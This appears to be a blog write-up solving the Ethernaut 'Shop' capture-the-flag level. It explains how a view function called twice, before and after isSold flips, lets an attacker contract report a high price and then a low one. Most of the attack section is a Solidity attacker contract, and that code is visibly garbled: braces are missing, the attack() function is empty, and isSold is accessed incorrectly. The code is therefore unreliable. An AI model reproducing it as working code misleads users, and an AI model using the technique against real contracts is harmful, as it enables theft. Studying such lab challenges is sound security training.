Ethernaut - Shop

Alex Sieusahai · May 12, 2022

Ethernaut - Shop

This uses cmichel’s Ethernaut solutions repo as a template, hence the similarities.

Initial insights

The flow of the program is, importantly:

  • Call _buyer.price()
  • isSold = true
  • set price = _buyer.price()

Defining the Attack Surface

We have the constraint that price() must have view visibility, so we can’t change the state of whatever the Buyer is.

But, we can, however, look at the state of other things no problem! Importantly, isSold is initialized to 0 which is false, we flip isSold after calling price() initially, and then we call price() again. So, we can abuse this and make the value of price() depend on isSold!

The exploit

pragma solidity ^0.7.3;

abstract contract IShop {
    uint public price;
    bool public isSold;
    function buy() external virtual;

contract ShopAttacker {
    IShop public challenge;
    uint256 timesCalled = 1;

    constructor(address challengeAddress) {
        challenge = IShop(challengeAddress);

    function attack() public {;

    function price() external view returns (uint256) {
        return challenge.isSold ? 0 : 100;

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